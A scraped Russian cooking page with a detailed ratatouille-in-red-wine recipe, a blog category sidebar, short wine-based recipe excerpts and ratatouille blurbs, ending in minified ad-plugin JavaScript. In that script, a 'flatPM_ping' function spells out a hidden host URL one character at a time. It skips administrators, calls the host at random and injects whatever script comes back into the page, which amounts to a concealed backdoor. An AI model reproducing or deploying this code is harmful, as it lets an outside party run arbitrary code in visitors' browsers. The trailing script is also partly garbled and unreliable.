Рататуй в красном вине: рецепт с фото

Рецепт: Рататуй в красном вине – для ценителей прекрасного

Предлагаю вам попробовать изысканное блюдо “Рататуй в красном вине”. В этом рецепте все, казалось бы, простые и знакомые нам овощи приобретают потрясающий новый вкус, раскрываются полностью своей сочностью, сладостью, терпкостью. Все овощи сохраняют свою форму, свои качества и при этом дополняют друг друга. Очень гармоничное блюдо. Ни в одном из ресторанов я не пробовала настолько сбалансированного овощного Рататуя. И это послевкусие вина. Это что-то неземное. Конечно Рататуй получается безалкогольный, весь алкоголь выпаривается. Но вкусовые нотки вина, его аромат – остаются. Попробуйте, вы будете в восторге!
Из перечисленного количества ингредиентов получается 4 порции.
Приступим. Для начала все овощи мы тщательно моем. И подсушиваем на полотенце.
Для тушения выбираем небольшую кастрюльку, на 1.5-2 литра. Из сковороды может убежать сок, лучше делать в глубокой посуде.

У баклажана мы срезаем шляпку с хвостиком. Режем баклажан пополам, потом снова пополам. И шинкуем на четвертинки толщиной 1-1.5 см.

Кладём в ёмкость, заливаем холодной водой, добавляем 1 ст. ложку соли, растворяем. И оставляем на час, для удаления горечи.

С кабачка снимаем кожу овощечисткой. Режем на аналогичные четвертинки.

Зубчики чеснока измельчаем мелко-мелко. Красную луковицу очищаем и режем на 8 частей. При желании можно использовать обычный репчатый лук.

Перец очищаем от семян и стеночек, режем произвольными средними кусочками 2 см х 2 см.

Помидоры нарезаем мелкими кубиками. Чем мельче, тем лучше. Они будут как пюре-подливка.

Сливаем воду из баклажан, оставляем их минут 5 подсохнуть в сухой посуде.

Подготовка завершена, приступаем к приготовлению. Соблюдаем указанное время, это необходимо, чтобы овощи не превратились в пюре.

На дно кастрюльки или очень глубокой сковороды выливаем растительное масло, около 5 ст. ложек. Желательно чтобы всё дно было промаслено на 2 мм. Ставим на огонь чуть ниже среднего, нагреваем. Если стенки у нашей посуды тонкие, то можно уменьшить огонь. Контролируйте.

Выкладываем в кастрюлю чеснок. Перемешивая лопаточкой жарим его 1 минуту. Он должен прогреться, побурлить в масле, но не подгореть.

Далее засыпаем в кастрюлю кабачки. Перемешиваем.

Тут же засыпаем в кастрюлю баклажаны. Перемешиваем. Жарим 10 минут. Без крышки. Ничего не должно подгорать, но всё должно тушиться. Если необходимо-уменьшите огонь или прибавьте.

Вливаем красное вино, перемешиваем.

Сразу добавляем лук и сладкий перец. Перемешиваем. Закрываем крышкой и тушим 20 минут.

Далее добавляем помидоры, томатную пасту (её можно заменить густым кетчупом).

Тут же добавляем соль.

Добавляем перец чёрный молотый.

Перемешиваем. Закрываем крышкой, тушим ещё минут 10-15.
Наши овощи будут выглядеть очень аппетитно, и пахнуть невероятно вкусно. Выключаем как только вам понравится консистенция на вкус. Овощи должны быть мягкими, но не рыхлыми. Не превратиться в пюре и не быть сырыми. Следите чтобы во время тушения они все были прикрыты жидкостью, или перемешивайте чаще.

Рататуй в красном вине готов! Неплохо сочетается с картофельным пюре. Идеально как праздничное блюдо и как романтический ужин с запахом Франции.
Надеюсь рецепт вам понравится и результат восхитит. Приятного вам аппетита!

LiveInternetLiveInternet

Метки

Музыкальный плеер

Рубрики

  • прочая выпечка (690)
  • торт (617)
  • музыка (593)
  • салаты (530)
  • закуски (388)
  • курица (379)
  • полезности (310)
  • мясо (305)
  • Здоровье (301)
  • Вторые блюда (271)
  • печенье (270)
  • Овощи (247)
  • Косметалогия (246)
  • десерт (222)
  • рыба (203)
  • картофель (196)
  • интернет (173)
  • супы (137)
  • фИЛЬМЫ (136)
  • Интересное (130)
  • Стихи (127)
  • Диета (124)
  • соусы (116)
  • Кекс (104)
  • БЕЗ ВЫПЕЧКИ (99)
  • шансон (88)
  • напитки (75)
  • грибы (73)
  • Тосты (71)
  • ЛИРу (70)
  • фотошоп (59)
  • дизайн (59)
  • БЛЮДА ИЗ ЛАВАША (56)
  • пирожки (55)
  • для детей (54)
  • Флешки (50)
  • картинки (49)
  • мастер-класс (46)
  • Генераторы (38)
  • видео (33)
  • Япония, Украина (32)
  • Мультиварка (25)
  • Идеи (25)
  • Соусы (25)
  • Обои (16)
  • Шторы (16)
  • плейкасты (14)
  • Религия (13)
  • суши, роллы (12)
  • Каши (11)
  • Макароны Паста (10)
  • Видео (9)
  • Законы (6)
  • пост (4)
  • ПРЯНЫЕ ТРАВЫ (4)
  • ИНТЕРНЕТ-НАВИГАТОР (2)
  • Ливия (2)
  • Электронная библиотека (1)
  • Аэрогриль (1)
  • (0)

Поиск по дневнику

Подписка по e-mail

Статистика

РАТАТУЙ В КРАСНОМ ВИНЕ

Пятница, 21 Сентября 2018 г. 07:00 + в цитатник

Рататуй в красном вине

по 1 шт. красного сладкого перца, цуккини и баклажана;

0,5 шт. острого перца;

3 ст.л. оливкового масла;

1 долька зимнего чеснока;

1 ст. л. рубленой зелени.

1 репчатая луковица светлого сорта;

0,5 шт. сладкого перца;

2 ст.л. любого томатного соуса или пасты;

2 ст. л. сухого красного вина;

4 ст. л. оливкового масла ;

4-6 мелких томатов сорта «черри»

Рецепт приготовления блюда в домашних условиях

С овощами можно экспериментировать – не все любят баклажаны или болгарский перец. Острый перец лучше не добавлять, если за обедом будут дети. Подготовленные овощи нарезаем кружками толщиной в 0,3 см.

Мелко нашинкованный лук обжариваем в разогретом масле, отправляем к нему нарезанный небольшими кусочками перец.

Через несколько минут добавляем на сковородку «черри», накрываем крышкой, выдерживаем 5 минут на огне. Заправляем массу томатной пастой или соусом, нагреваем до 100 градусов.

Вливаем вино, приправляем специями и приправами по вкусу. Снимаем с плиты, когда закипит. На дно формы для запеканок выкладываем ровным слоем половину соуса, сверху «чешуей» или «гармошкой» размещаем овощи. Чередуем их: перец, баклажан, кабачок, помидор.

Складываем в блендер ингредиенты для пряной заправки, превращаем в однородную массу. Заливаем ею поверхность рататуя, накрываем фольгой. Отправляем блюдо запекаться в разогретую до 190 градусов духовку.

Через 60 минут достаем рататуй из духовки, даем настояться четверть часа.

Рататуй с белым вином

Рататуй с белым вином

Что понадобится:

1 баклажан, 4 цукини, 3 помидора, 1 болгарский перец, 1 зубчик чеснока, ? стакана белого вина, 2 ст. л. растительного масла, молотый перец, соль по вкусу

И начинаем готовить:

Измельченный чеснок обжарить в масле. Добавить нарезанные цукини, баклажан, помидоры, болгарский перец, тушить 5 мин. Затем влить вино, посолить, поперчить, аккуратно перемешать, накрыть посуду крышкой и тушить 40 мин, до полной готовности блюда.

Данный текст является ознакомительным фрагментом.

Читать книгу целиком

Похожие главы из других книг

СОУСЫ С ВИНОМ (БЕЛЫМ И КРАСНЫМ)

СОУСЫ С ВИНОМ (БЕЛЫМ И КРАСНЫМ) Соус винный. Растереть желтки с сахаром и картофельной мукой, разведенной в холодной воде. Понемногу влить подогретое белое вино, поставить на умеренный огонь и тщательно перемешивать, не давая закипеть. Загустевший соус снять с огня и

Утка с белым вином

Утка с белым вином Ингредиенты:Тушка утки, вино белое – 250 г, лимон – 1 шт., соль, перец.Для украшения: маслины без косточек – 10 шт., кубики желе – 10 шт., капуста соленая – 50 г, яблоки – 5 шт., сливы маринованные – 5 шт., зелень петрушки. Для фарша: крупа гречневая – 300 г, потроха

Борджиа с белым вином

Борджиа с белым вином Требуется: 2 ч. л. кофе, 1/2 стакана воды, 1 ч. л. порошка какао, 1 ст. л. сливок, 1/2 ч. л. цедры апельсина, 3 ст. л. белого виноградного вина.Способ приготовления. Залейте половину воды в кофеварку, доведите до кипения. Приготовьте кофе вышеуказанным способом.

Судак с белым вином

Судак с белым вином

Варенье из цукини с белым вином

Варенье из цукини с белым вином Ингредиенты Желтые цукини – 400 г Сахар – 200 гКорица – 1 палочкаСухое белое вино – 70 млСпособ приготовления Молодые неочищенные цукини без плодоножки разделить пополам и нарезать тонкими дольками. Затем выложить слоями в кастрюлю,

Сазан с белым вином

Сазан с белым вином Ингредиенты1 кг сазана, 100 мл белого вина, 2 ст. л. растительного масла, 3–4 помидора, 1 пучок зелени укропа, перец, соль. Способ приготовленияРыбу почистить, выпотрошить, промыть, нарезать порционными кусками, посолить, посыпать перцем, залить вином и

Бульон со свеклой и белым вином

Бульон со свеклой и белым вином ИнгредиентыБульон мясной — 2 лСвекла — 200 гЗелень укропа — 15 гСахар — 7 гВино белое сухое — 30 млСоль и черный молотый перец по вкусуСпособ приготовленияСвеклу отварить, очистить и нарезать тонкими ломтиками. Зелень укропа промыть,

Уха с белым вином по-венгерски

Уха с белым вином по-венгерски Ингредиенты:200 г рыбы (любой), 60 г белого вина, 20 г репчатого лука, 30 г моркови, 15 г корней петрушки, 30 г зеленого сладкого перца, 30 г помидоров, красный молотый перец, соль.Способ приготовления:Репчатый лук, морковь, корень петрушки, сладкий

Телятина с белым вином

Телятина с белым вином Телятину нарезать на куски, залить холодной водой и вином (либо только вином), положить морковь, зелень, специи, довести до кипения, постоянно снимая пену. Варить на слабом огне, пока мясо не размягчится. Добавить желток, сок и измельченную на терке

Мороженое с белым вином

Мороженое с белым вином Ингредиенты: 500 г клубничного мороженого; ? стакана сухого игристого белого вина (Spumante); сок 1 лимона; 2 киви; несколько кусочков консервированного ананаса; 1 персик; 4 сливы; листочки свежей мяты. Приготовление: Вино

Суп из кальмаров с белым вином

Суп из кальмаров с белым вином Кальмары – 500 г, рис дикий – 100 г, зеленый горошек – 200 г, бобы красные – 100 г, морковь – 200 г, брокколи – 200 г, лук репчатый – 1 головка, помидоры – 100 г, лимон – 1 шт., петрушка и сельдерей – по 1 пучку, перец красный молотый – 5 г, вино белое

Суп луковый с белым вином

Суп луковый с белым вином Ингредиенты: 5 луковиц, 2 ломтика отрубного хлеба, 20 мл подсолнечного масла, 30 г муки, 500 мл светлого бульона (мясного или овощ ного), 250 мл белого сухого вина, 60 г сыра (любого, тертого), черный молотый перец, соль.Способ приготовления: Лук очистить,

Жареный сом с белым вином

Жареный сом с белым вином Ингредиенты: 1 кг рыбы, 100 мл белого вина, 40 мл растительного масла, 200 г помидоров, зелень укропа, перец, соль.Способ приготовления: Рыбу выпотрошить, вымыть, нарезать порционными кусками, посолить, посыпать перцем, залить вином и оставить

Сазан с белым вином

Сазан с белым вином Ингредиенты:1 кг сазана, 100 мл белого вина, 2 столовые ложки растительного масла, 3–4 помидора, 1 пучок укропа, перец, соль.Способ приготовления:Рыбу почистить, выпотрошить, промыть, нарезать порционными кусками, посолить, посыпать перцем, залить вином и

Суп рыбный с белым вином

Суп рыбный с белым вином КомпонентыФиле трески – 500 г Лук репчатый – 1 шт. Морковь – 1 шт. Картофель – 3 шт. Вино сухое белое – 0,5 стакана Вода – 1,2 л Масло растительное – 2 столовые ложкиМука – 2 столовые ложки Петрушка и сельдерей – по 1 пучку Соль – по вкусуСпособ

Сазан с белым вином

Сазан с белым вином Ингредиенты1 кг сазана, 100 мл белого вина, 2 столовые ложки растительного масла, 3–4 помидора, 1 пучок зелени укропа, перец, соль.Способ приготовленияРыбу почистить, выпотрошить, промыть, нарезать порционными кусками, посолить, посыпать перцем, залить

Рататуй

Рататуй по-французски

Это легкое, не жирное и очень вкусное блюдо, которое легко приготовить. А в летний период эти продукты всегда есть под рукой.

Рататуй

Знаменитое французское овощное блюдо. Рецепт высмотрела в одноименном мультфильме 🙂

Курица “Рататуй”

Наверное, многим знакомо это традиционное овощное блюдо прованской кухни из перца, баклажанов и кабачков, чем-то напоминающее овощное рагу. В этом рецепте получаем полноценное блюдо за счет добавления куриного филе. Получается необыкновенно вкусно – сочное куриное мясо под слоем ароматных овощей. К тому же, блюдо по-весеннему легкое и нежное! Надеюсь, и вам понравится!

Соус “Рататуй” со спагетти

Предлагаю приготовить вкусный и насыщенный соус, который по вкусу очень напоминает французское блюдо “Рататуй”. Соус идеально подходит к любым видам пасты и макарон.

Рататуй

Думаю, что Рататуй любят все. 3а его идеальное сочетание вкуса овощей, 3а его легкость и яркие летние краски. Предлагаю свой вариант – с недавнего времени стала готовить его в духовке – легкий и нежирный Рататуйчик.

Суп “Рататуй”

Суп “Рататуй” это блюдо французской кухни. Благодаря пикантному вкусу, набору овощей и аромату трав, суп вызывает желание скорей его попробовать. К супу очень подойдет поджаренный багет с плавленным сыром.

Рататуй от Реми

Я не могла обойти стороной этот дивный мультик, каждый кадр которого пропитан слоганом – “Готовить может каждый”! Друзья мои, я решила приготовить Рататуй из одноименного мультика, но с небольшим секретом, которое делает блюдо просто бесподобным!

Салат “Рататуй”

Рецепт этого салата нашла в кулинарном журнале. На День Рождения мужа готовила. Получился вкусный и сытненький салатик. Нам понравился. Название решила не изменять.

Рататуй

“Ratatouille” – сочные ароматные и полезные овощи с нежным вкусом! Прекрасный гарнир и самостоятельное постное блюдо!

Рататуй с мясом на сковороде

Никто и никогда не переубедит меня в том, что Рататуй нужно тушить, а не запекать, при этом красиво выкладывая овощи гармошкой. Ведь многие знают, что это красивое название происходит от Rata-еда в простонародье, и Touiller-перемешивать. Согласитесь, при запекании сделать это достаточно сложно. Тем более, это блюдо простых работяг, и что-то мне подсказывает, что они врядли заморачивались над эстетическим видом своей трапезы. Я обожаю рататуй всей душой, так же, как и мясо! 🙂 Именно поэтому я и решила совместить эти два горячо любимых мною блюда в одно. А когда совмещаешь овощи и мясо-не вкусно быть не может априори! Приятного аппетита, дорогие поварята!

Рататуй. Рататуй – это блюдо французской кухни, которое готовится из помидоров, болгарского перца, баклажанов и других ингридиентов. Очень популярно в Провансе.

Нельзя не отметить, что наши соотечественники заинтересовались блюдом после просмотра одноименного мультфильма, представленного на суд зрителей студией “Pixar” – о талантливом мышонке, который помогает своему другу, работающему в ресторане, произвести впечатление на ресторанного критика.

Этимология слова восходит к «ratatouille» («rata» – пища и «touiller» – перемешивать, размешивать). Помимо перца, кабачков и баклажанов при приготовлении используются лук, чеснок, помидоры, травы – базилик, фенхель, розмарин, петрушка, тимьян, базилик. Овощи и специи тушат в оливковом масле.

Первоначально рататуй было «простонародным» блюдом, ведь для его приготовления использовались самые обычные продукты – помидоры, лук, чеснок и другие овощи. Однако прошло время, и вкус блюда оценили представители высшего общества. Сегодня рататуй можно найти в меню дорогих ресторанов, которые могут похвастаться звездами Мишлена.

Рататуй лучше всего готовить из свежих овощей. Он может быть базовым блюдом, а также подаваться в качестве гарнира. Его сервируют как горячим, и холодным. Перед подачей иногда заворачивают в блины.

Рататуй полюбился вегетарианцам, поскольку мясом в нем и «не пахнет».

Ратутую приписывают «родство» с испанским писто, венгерским лечо и итальянской капонатой.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};